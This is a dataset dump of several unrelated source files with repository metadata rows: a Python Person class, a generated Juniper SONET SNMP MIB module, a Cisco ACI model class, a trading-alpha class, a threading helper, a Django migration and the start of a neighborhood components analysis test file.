print("Dimension {0}, time elapsed {1} sec.\n".format(A.shape[0], elapsed_time))
MPI.Finalize() | [
"[email protected]"
] | |
575d02aa9fb79160437e642f6d8501b4b1d3b89c | 0f556b9d4e250df73bf1e0929dbd4afad51e82fe | /person/3/person.py | 18a8f9d43f414810584c840c8d787016b5ca9207 | [] | no_license | unabl4/PythonCodeClub | 0ef1cb4d145860a4fda528c2eea513d0ba6b8327 | 72d5887342c1e0b304307a0e0ac9eb78f0202c35 | refs/heads/master | 2021-04-30T04:42:03.266029 | 2019-02-18T22:09:12 | 2019-02-18T22:09:12 | 121,541,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 604 | py | from datetime import date
class Person:
def __init__(self, first_name, last_name, birth_date):
self.first_name = first_name
self.last_name = last_name
self.birth_date = birth_date
def age(self):
return int((date.today()-self.birth_date).days // 365.25)
def full_name(self):
return "%s %s" % (self.first_name, self.last_name)
# ---
class Female(Person):
def __init__(self, first_name, last_name, birth_date):
super().__init__(first_name, last_name, birth_date)
def age(self):
age = super().age()
return min(20, age)
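# --- Added usage sketch (not part of the original file) ---
if __name__ == '__main__':
    p = Person('John', 'Doe', date(1980, 5, 17))
    f = Female('Jane', 'Doe', date(1980, 5, 17))
    print(p.full_name(), p.age())  # actual age in years
    print(f.full_name(), f.age())  # Female caps the reported age at 20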
| [
"[email protected]"
] | |
97e989546fc1cd3b939a0e6230c20cd0361c5a99 | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp-with-texts/Juniper-SONET-CONF.py | c3b8be3cccc5ea7d781b518f90c1487395270edc | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 11,118 | py | #
# PySNMP MIB module Juniper-SONET-CONF (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Juniper-SONET-CONF
# Produced by pysmi-0.3.4 at Wed May 1 14:04:23 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueRangeConstraint, ConstraintsUnion, ValueSizeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueRangeConstraint", "ConstraintsUnion", "ValueSizeConstraint", "SingleValueConstraint")
juniAgents, = mibBuilder.importSymbols("Juniper-Agents", "juniAgents")
AgentCapabilities, ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "AgentCapabilities", "ModuleCompliance", "NotificationGroup")
iso, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, Counter32, ObjectIdentity, Counter64, IpAddress, Bits, Unsigned32, Gauge32, TimeTicks, NotificationType, ModuleIdentity, MibIdentifier = mibBuilder.importSymbols("SNMPv2-SMI", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "Counter32", "ObjectIdentity", "Counter64", "IpAddress", "Bits", "Unsigned32", "Gauge32", "TimeTicks", "NotificationType", "ModuleIdentity", "MibIdentifier")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
juniSonetAgent = ModuleIdentity((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40))
juniSonetAgent.setRevisions(('2005-09-15 20:26', '2003-07-16 17:22', '2003-01-31 20:09', '2002-04-09 23:44', '2002-02-04 21:35', '2001-04-03 22:35',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: juniSonetAgent.setRevisionsDescriptions(('APS-MIB - mib added.', 'Juniper-UNI-SONET-MIB: Added path event status and notification support.', 'Juniper-UNI-SONET-MIB: Replaced Unisphere names with Juniper names.', 'APS-MIB-JUNI: Added support for IETF draft-ietf-atommib-sonetaps-mib-05 as a Juniper experimental MIB.', 'Separate out the SONET VT support.', 'The initial release of this management information module.',))
if mibBuilder.loadTexts: juniSonetAgent.setLastUpdated('200509152026Z')
if mibBuilder.loadTexts: juniSonetAgent.setOrganization('Juniper Networks, Inc.')
if mibBuilder.loadTexts: juniSonetAgent.setContactInfo(' Juniper Networks, Inc. Postal: 10 Technology Park Drive Westford, MA 01886-3146 USA Tel: +1 978 589 5800 E-mail: [email protected]')
if mibBuilder.loadTexts: juniSonetAgent.setDescription('The agent capabilities definitions for the SONET component of the SNMP agent in the Juniper E-series family of products.')
juniSonetAgentV1 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 1))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetAgentV1 = juniSonetAgentV1.setProductRelease('Version 1 of the SONET component of the JUNOSe SNMP agent. This\n version of the SONET component was supported in JUNOSe 1.x system\n releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetAgentV1 = juniSonetAgentV1.setStatus('obsolete')
if mibBuilder.loadTexts: juniSonetAgentV1.setDescription('The MIBs supported by the SNMP agent for the SONET application in JUNOSe. These capabilities became obsolete when support for the standard VT group was added.')
juniSonetAgentV2 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 2))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetAgentV2 = juniSonetAgentV2.setProductRelease('Version 2 of the SONET component of the JUNOSe SNMP agent. This\n version of the SONET component was supported in JUNOSe 2.x system\n releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetAgentV2 = juniSonetAgentV2.setStatus('obsolete')
if mibBuilder.loadTexts: juniSonetAgentV2.setDescription('The MIBs supported by the SNMP agent for the SONET application in JUNOSe. These capabilities became obsolete when support for the proprietary path and VT groups were added.')
juniSonetAgentV3 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 3))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetAgentV3 = juniSonetAgentV3.setProductRelease('Version 3 of the SONET component of the JUNOSe SNMP agent. This\n version of the SONET component was supported in JUNOSe 3.0 and 3.1\n system releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetAgentV3 = juniSonetAgentV3.setStatus('obsolete')
if mibBuilder.loadTexts: juniSonetAgentV3.setDescription('The MIBs supported by the SNMP agent for the SONET application in JUNOSe. These capabilities became obsolete when support for the RFC-2558 version of the SONET-MIB and far-end statistics were added.')
juniSonetAgentV4 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 4))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetAgentV4 = juniSonetAgentV4.setProductRelease('Version 4 of the SONET component of the JUNOSe SNMP agent. This\n version of the SONET component was supported in JUNOSe 3.2 system\n releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetAgentV4 = juniSonetAgentV4.setStatus('obsolete')
if mibBuilder.loadTexts: juniSonetAgentV4.setDescription('The MIBs supported by the SNMP agent for the SONET application in JUNOSe. These capabilities became obsolete when Virtual Tributary (VT) support was searated out into a separate capabilities statement.')
juniSonetBasicAgent = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 5))
juniSonetBasicAgentV1 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 5, 1))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV1 = juniSonetBasicAgentV1.setProductRelease('Version 1 of the basic SONET component of the JUNOSe SNMP agent. It\n does not include Virtual Tributary (VT) support. This version of the\n basic SONET component was supported in JUNOSe 3.3 and subsequent 3.x\n system releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV1 = juniSonetBasicAgentV1.setStatus('obsolete')
if mibBuilder.loadTexts: juniSonetBasicAgentV1.setDescription('The MIB conformance groups supported by the SNMP agent for the SONET application in JUNOSe. These capabilities became obsolete when support was added for the Internet draft of the APS MIB.')
juniSonetBasicAgentV2 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 5, 2))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV2 = juniSonetBasicAgentV2.setProductRelease('Version 2 of the basic SONET component of the JUNOSe SNMP agent. It\n does not include Virtual Tributary (VT) support. This version of the\n basic SONET component was supported in JUNOSe 4.x system releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV2 = juniSonetBasicAgentV2.setStatus('obsolete')
if mibBuilder.loadTexts: juniSonetBasicAgentV2.setDescription('The MIB conformance groups supported by the SNMP agent for the SONET application in JUNOSe. These capabilities became obsolete when new medium and path controls were added.')
juniSonetBasicAgentV3 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 5, 3))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV3 = juniSonetBasicAgentV3.setProductRelease('Version 3 of the basic SONET component of the JUNOSe SNMP agent. It\n does not include Virtual Tributary (VT) support. This version of the\n basic SONET component was supported in JUNOSe 5.0 system releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV3 = juniSonetBasicAgentV3.setStatus('obsolete')
if mibBuilder.loadTexts: juniSonetBasicAgentV3.setDescription('The MIB conformance groups supported by the SNMP agent for the SONET application in JUNOSe. These capabilities became obsolete when path event status and notification support was added.')
juniSonetBasicAgentV4 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 5, 4))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV4 = juniSonetBasicAgentV4.setProductRelease('Version 4 of the basic SONET component of the JUNOSe SNMP agent. It\n does not include Virtual Tributary (VT) support. This version of the\n basic SONET component is supported in JUNOSe 5.1 and subsequent system\n releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV4 = juniSonetBasicAgentV4.setStatus('obsolete')
if mibBuilder.loadTexts: juniSonetBasicAgentV4.setDescription('The MIB conformance groups supported by the SNMP agent for the SONET application in JUNOSe.')
juniSonetBasicAgentV5 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 5, 5))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV5 = juniSonetBasicAgentV5.setProductRelease('Version 5 of the basic SONET component of the JUNOSe SNMP agent. It\n does not include Virtual Tributary (VT) support. This version of the\n basic SONET component is supported in JUNOSe 7.2 and subsequent system\n releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetBasicAgentV5 = juniSonetBasicAgentV5.setStatus('current')
if mibBuilder.loadTexts: juniSonetBasicAgentV5.setDescription('The MIB conformance groups supported by the SNMP agent for the SONET application in JUNOSe.')
juniSonetVTAgent = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 6))
juniSonetVTAgentV1 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40, 6, 1))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetVTAgentV1 = juniSonetVTAgentV1.setProductRelease('Version 1 of the SONET VT component of the JUNOSe SNMP agent. This\n version of the SONET component is supported in JUNOSe 3.3 and subsequent\n system releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniSonetVTAgentV1 = juniSonetVTAgentV1.setStatus('current')
if mibBuilder.loadTexts: juniSonetVTAgentV1.setDescription('The MIB conformance groups supported by the SNMP agent for the SONET application in JUNOSe.')
mibBuilder.exportSymbols("Juniper-SONET-CONF", juniSonetAgent=juniSonetAgent, juniSonetBasicAgentV3=juniSonetBasicAgentV3, juniSonetAgentV4=juniSonetAgentV4, PYSNMP_MODULE_ID=juniSonetAgent, juniSonetBasicAgentV5=juniSonetBasicAgentV5, juniSonetAgentV1=juniSonetAgentV1, juniSonetBasicAgentV1=juniSonetBasicAgentV1, juniSonetAgentV3=juniSonetAgentV3, juniSonetBasicAgentV4=juniSonetBasicAgentV4, juniSonetAgentV2=juniSonetAgentV2, juniSonetVTAgentV1=juniSonetVTAgentV1, juniSonetBasicAgent=juniSonetBasicAgent, juniSonetBasicAgentV2=juniSonetBasicAgentV2, juniSonetVTAgent=juniSonetVTAgent)
| [
"[email protected]"
] | |
ec1a2c058317b511d0867d6fd68a928832eda934 | f4b60f5e49baf60976987946c20a8ebca4880602 | /lib64/python2.7/site-packages/acimodel-1.3_2j-py2.7.egg/cobra/modelimpl/fv/rsctxtoospfctxpol.py | 24471250b333be80cb7836f09ea259df48c17457 | [] | no_license | cqbomb/qytang_aci | 12e508d54d9f774b537c33563762e694783d6ba8 | a7fab9d6cda7fadcc995672e55c0ef7e7187696e | refs/heads/master | 2022-12-21T13:30:05.240231 | 2018-12-04T01:46:53 | 2018-12-04T01:46:53 | 159,911,666 | 0 | 0 | null | 2022-12-07T23:53:02 | 2018-12-01T05:17:50 | Python | UTF-8 | Python | false | false | 9,042 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2016 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class RsCtxToOspfCtxPol(Mo):
"""
A source relation to the per-address family OSPF context policy.
"""
meta = NamedSourceRelationMeta("cobra.model.fv.RsCtxToOspfCtxPol", "cobra.model.ospf.CtxPol")
meta.targetNameProps["name"] = "tnOspfCtxPolName"
meta.cardinality = SourceRelationMeta.N_TO_M
meta.moClassName = "fvRsCtxToOspfCtxPol"
meta.rnFormat = "rsctxToOspfCtxPol-[%(tnOspfCtxPolName)s]-%(af)s"
meta.category = MoCategory.RELATIONSHIP_TO_LOCAL
meta.label = "OSPF Context Policy"
meta.writeAccessMask = 0x2001
meta.readAccessMask = 0x2001
meta.isDomainable = False
meta.isReadOnly = False
meta.isConfigurable = True
meta.isDeletable = True
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Inst")
meta.childClasses.add("cobra.model.fault.Counts")
meta.childClasses.add("cobra.model.health.Inst")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Counts", "fltCnts"))
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Inst", "fault-"))
meta.childNamesAndRnPrefix.append(("cobra.model.health.Inst", "health"))
meta.parentClasses.add("cobra.model.fv.Ctx")
meta.superClasses.add("cobra.model.reln.Inst")
meta.superClasses.add("cobra.model.reln.To")
meta.superClasses.add("cobra.model.pol.NToRef")
meta.rnPrefixes = [
('rsctxToOspfCtxPol-', True),
('-', True),
]
prop = PropMeta("str", "af", "af", 17597, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
prop.defaultValue = 2
prop.defaultValueStr = "ipv6-ucast"
prop._addConstant("ipv4-ucast", "ipv4-unicast-address-family", 1)
prop._addConstant("ipv6-ucast", "ipv6-unicast-address-family", 2)
meta.props.add("af", prop)
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "forceResolve", "forceResolve", 107, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = True
prop.defaultValueStr = "yes"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("forceResolve", prop)
prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "monPolDn", "monPolDn", 17603, PropCategory.REGULAR)
prop.label = "Monitoring policy attached to this observable object"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("monPolDn", prop)
prop = PropMeta("str", "rType", "rType", 106, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 1
prop.defaultValueStr = "mo"
prop._addConstant("local", "local", 3)
prop._addConstant("mo", "mo", 1)
prop._addConstant("service", "service", 2)
meta.props.add("rType", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "state", "state", 103, PropCategory.REGULAR)
prop.label = "State"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "unformed"
prop._addConstant("cardinality-violation", "cardinality-violation", 5)
prop._addConstant("formed", "formed", 1)
prop._addConstant("invalid-target", "invalid-target", 4)
prop._addConstant("missing-target", "missing-target", 2)
prop._addConstant("unformed", "unformed", 0)
meta.props.add("state", prop)
prop = PropMeta("str", "stateQual", "stateQual", 104, PropCategory.REGULAR)
prop.label = "State Qualifier"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "none"
prop._addConstant("default-target", "default-target", 2)
prop._addConstant("mismatch-target", "mismatch-target", 1)
prop._addConstant("none", "none", 0)
meta.props.add("stateQual", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "tCl", "tCl", 17599, PropCategory.REGULAR)
prop.label = "Target-class"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 1416
prop.defaultValueStr = "ospfCtxPol"
prop._addConstant("ospfCtxPol", None, 1416)
prop._addConstant("unspecified", "unspecified", 0)
meta.props.add("tCl", prop)
prop = PropMeta("str", "tContextDn", "tContextDn", 4990, PropCategory.REGULAR)
prop.label = "Target-context"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("tContextDn", prop)
prop = PropMeta("str", "tDn", "tDn", 100, PropCategory.REGULAR)
prop.label = "Target-dn"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("tDn", prop)
prop = PropMeta("str", "tRn", "tRn", 4989, PropCategory.REGULAR)
prop.label = "Target-rn"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 512)]
meta.props.add("tRn", prop)
prop = PropMeta("str", "tType", "tType", 4988, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "name"
prop._addConstant("all", "all", 2)
prop._addConstant("mo", "mo", 1)
prop._addConstant("name", "name", 0)
meta.props.add("tType", prop)
prop = PropMeta("str", "tnOspfCtxPolName", "tnOspfCtxPolName", 17598, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
prop.range = [(1, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("tnOspfCtxPolName", prop)
prop = PropMeta("str", "uid", "uid", 8, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("uid", prop)
meta.namingProps.append(getattr(meta.props, "tnOspfCtxPolName"))
getattr(meta.props, "tnOspfCtxPolName").needDelimiter = True
meta.namingProps.append(getattr(meta.props, "af"))
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Ancestor"
meta.deploymentQueryPaths.append(DeploymentPathMeta("CtxToNwIf", "Private Network to Interface", "cobra.model.nw.If"))
def __init__(self, parentMoOrDn, tnOspfCtxPolName, af, markDirty=True, **creationProps):
namingVals = [tnOspfCtxPolName, af]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
3705d6628ca7f9c0175c12c5e79138b0bc3be4c0 | 1eee2c9c105148904d0fb47cee227cfd20241b76 | /alpha/alpha_beats_28.py | 5bfdccc7f1e53b5628dc5209c82fea3bfca59b63 | [] | no_license | fred-hz/zeta | be9f6f466b75767cc1a45a4004d1c84e5d559b6b | e7b631447fff6e58928d6ac15702338b7cc8e3e7 | refs/heads/master | 2021-09-05T01:03:31.387379 | 2018-01-23T04:15:58 | 2018-01-23T04:15:58 | 118,187,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,281 | py | from alpha.alpha_base import AlphaBase
import numpy as np
import util
class AlphaBeats_28(AlphaBase):
def initialize(self):
self.delay = int(self.params['delay'])
self.is_valid = self.context.is_valid
self.alpha = self.context.alpha
self.cps = self.context.fetch_data('adj_close')
self.low = self.context.fetch_data('adj_low')
def compute_day(self, di):
indicator = np.zeros(len(self.context.ii_list))
indicator.flat = np.nan
for ii in range(len(self.context.ii_list)):
if self.is_valid[di][ii]:
                # Skip if the 20-day low window holds no valid values; NumPy
                # boolean negation is ~, not the unary minus used originally.
                if np.where(~np.isnan(self.low[di - self.delay - np.arange(20), ii]))[0].size == 0:
continue
indicator[ii] = np.nanargmin(self.low[di-self.delay-np.arange(20), ii])
        util.rank(indicator)  # repo-local helper; presumably rank-transforms indicator in place
for ii in range(len(self.context.ii_list)):
if self.is_valid[di][ii]:
temp = np.nanmean(self.cps[di-self.delay-np.arange(5), ii])
if abs(temp) > 1e-5:
                    # indicator[ii]: use the per-instrument rank, not the whole array
                    self.alpha[ii] = (temp - self.cps[di - self.delay][ii]) / temp * (indicator[ii] - 0.5)
def dependencies(self):
self.register_dependency('adj_close')
self.register_dependency('adj_low') | [
"[email protected]"
] | |
5f042357ce4755b0b73969f346665bf0304b6569 | 7d8a4d58fc4c5a73ce8c85e513253a86d6290d3b | /script.module.eggscrapers/lib/eggscrapers/modules/workers.py | 0699f6d316130d4fa9ee280485fcae4f73959dcd | [] | no_license | bopopescu/icon | cda26d4463d264b7e2080da51f29d84cc48dfb81 | e385a6225dd11b7fea5a11215d655cf5006bb018 | refs/heads/master | 2022-01-12T19:00:04.951604 | 2019-07-10T05:35:44 | 2019-07-10T05:35:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 946 | py | # -*- coding: utf-8 -*-
'''
Eggman Add-on
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import threading
class Thread(threading.Thread):
    def __init__(self, target, *args):
        # Initialize the base class first: on Python 3, Thread.__init__ also
        # assigns self._target and self._args, which would otherwise clobber
        # the values set here (the original order only worked on Python 2,
        # where the base attributes were name-mangled).
        threading.Thread.__init__(self)
        self._target = target
        self._args = args

    def run(self):
        self._target(*self._args)
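# --- Added usage sketch (assumed caller pattern, not in the original file):
# fan out two calls and wait for both, as scraper source modules typically do.
if __name__ == '__main__':
    def fetch(name):
        print('fetching %s' % name)
    threads = [Thread(fetch, name) for name in ('sourceA', 'sourceB')]
    for t in threads:
        t.start()
    for t in threads:
        t.join()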
| [
"[email protected]"
] | |
9500aa334d1daba13d7d173c5f462b375f143dd5 | d063684dd03293eb0f980568af088d26ab087dbe | /debadmin/migrations/0075_auto_20191108_1225.py | dd5f3b44bf87cdc1a4bd8999b7965e71e5bee1f2 | [] | no_license | abhaysantra/debscientific | ce88e5ef44da8d6771c3652ed0ad02900ccd8ed2 | 88ec65616fd24052bbdbba8b00beba85493f5aea | refs/heads/master | 2020-11-26T22:09:33.820247 | 2019-12-20T07:58:43 | 2019-12-20T07:58:43 | 229,213,810 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,072 | py | # Generated by Django 2.2.6 on 2019-11-08 06:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('debadmin', '0074_auto_20191107_1914'),
]
operations = [
migrations.AddField(
model_name='order_details',
name='cancel_date',
field=models.DateField(null=True),
),
migrations.AddField(
model_name='order_details',
name='cancel_reason',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='order_details',
name='deliver_date',
field=models.DateField(null=True),
),
migrations.AddField(
model_name='order_details',
name='return_date',
field=models.DateField(null=True),
),
migrations.AddField(
model_name='order_details',
name='return_reason',
field=models.TextField(null=True),
),
]
| [
"[email protected]"
] | |
3aa97b853fd98ddf44122b5bcd60123d34d92249 | 162e0e4791188bd44f6ce5225ff3b1f0b1aa0b0d | /mrex/neighbors/tests/test_nca.py | aae03f4cc2ab2f30e92c437813adba3fbbd1ac11 | [] | no_license | testsleeekGithub/trex | 2af21fa95f9372f153dbe91941a93937480f4e2f | 9d27a9b44d814ede3996a37365d63814214260ae | refs/heads/master | 2020-08-01T11:47:43.926750 | 2019-11-06T06:47:19 | 2019-11-06T06:47:19 | 210,987,245 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,758 | py | # coding: utf-8
"""
Testing for Neighborhood Component Analysis module (mrex.neighbors.nca)
"""
# Authors: William de Vazelhes <[email protected]>
# John Chiotellis <[email protected]>
# License: BSD 3 clause
import pytest
import re
import numpy as np
from numpy.testing import assert_array_equal, assert_array_almost_equal
from scipy.optimize import check_grad
from mrex import clone
from mrex.exceptions import ConvergenceWarning
from mrex.utils import check_random_state
from mrex.utils.testing import (assert_raises,
assert_raise_message, assert_warns_message)
from mrex.datasets import load_iris, make_classification, make_blobs
from mrex.neighbors.nca import NeighborhoodComponentsAnalysis
from mrex.metrics import pairwise_distances
rng = check_random_state(0)
# load and shuffle iris dataset
iris = load_iris()
perm = rng.permutation(iris.target.size)
iris_data = iris.data[perm]
iris_target = iris.target[perm]
EPS = np.finfo(float).eps
def test_simple_example():
"""Test on a simple example.
Puts four points in the input space where the opposite labels points are
next to each other. After transform the samples from the same class
should be next to each other.
"""
X = np.array([[0, 0], [0, 1], [2, 0], [2, 1]])
y = np.array([1, 0, 1, 0])
nca = NeighborhoodComponentsAnalysis(n_components=2, init='identity',
random_state=42)
nca.fit(X, y)
X_t = nca.transform(X)
assert_array_equal(pairwise_distances(X_t).argsort()[:, 1],
np.array([2, 3, 0, 1]))
def test_toy_example_collapse_points():
"""Test on a toy example of three points that should collapse
We build a simple example: two points from the same class and a point from
a different class in the middle of them. On this simple example, the new
(transformed) points should all collapse into one single point. Indeed, the
objective is 2/(1 + exp(d/2)), with d the euclidean distance between the
two samples from the same class. This is maximized for d=0 (because d>=0),
with an objective equal to 1 (loss=-1.).
"""
rng = np.random.RandomState(42)
input_dim = 5
two_points = rng.randn(2, input_dim)
X = np.vstack([two_points, two_points.mean(axis=0)[np.newaxis, :]])
y = [0, 0, 1]
class LossStorer:
def __init__(self, X, y):
self.loss = np.inf # initialize the loss to very high
# Initialize a fake NCA and variables needed to compute the loss:
self.fake_nca = NeighborhoodComponentsAnalysis()
self.fake_nca.n_iter_ = np.inf
self.X, y, _ = self.fake_nca._validate_params(X, y)
self.same_class_mask = y[:, np.newaxis] == y[np.newaxis, :]
def callback(self, transformation, n_iter):
"""Stores the last value of the loss function"""
self.loss, _ = self.fake_nca._loss_grad_lbfgs(transformation,
self.X,
self.same_class_mask,
-1.0)
loss_storer = LossStorer(X, y)
nca = NeighborhoodComponentsAnalysis(random_state=42,
callback=loss_storer.callback)
X_t = nca.fit_transform(X, y)
# test that points are collapsed into one point
assert_array_almost_equal(X_t - X_t[0], 0.)
assert abs(loss_storer.loss + 1) < 1e-10
def test_finite_differences():
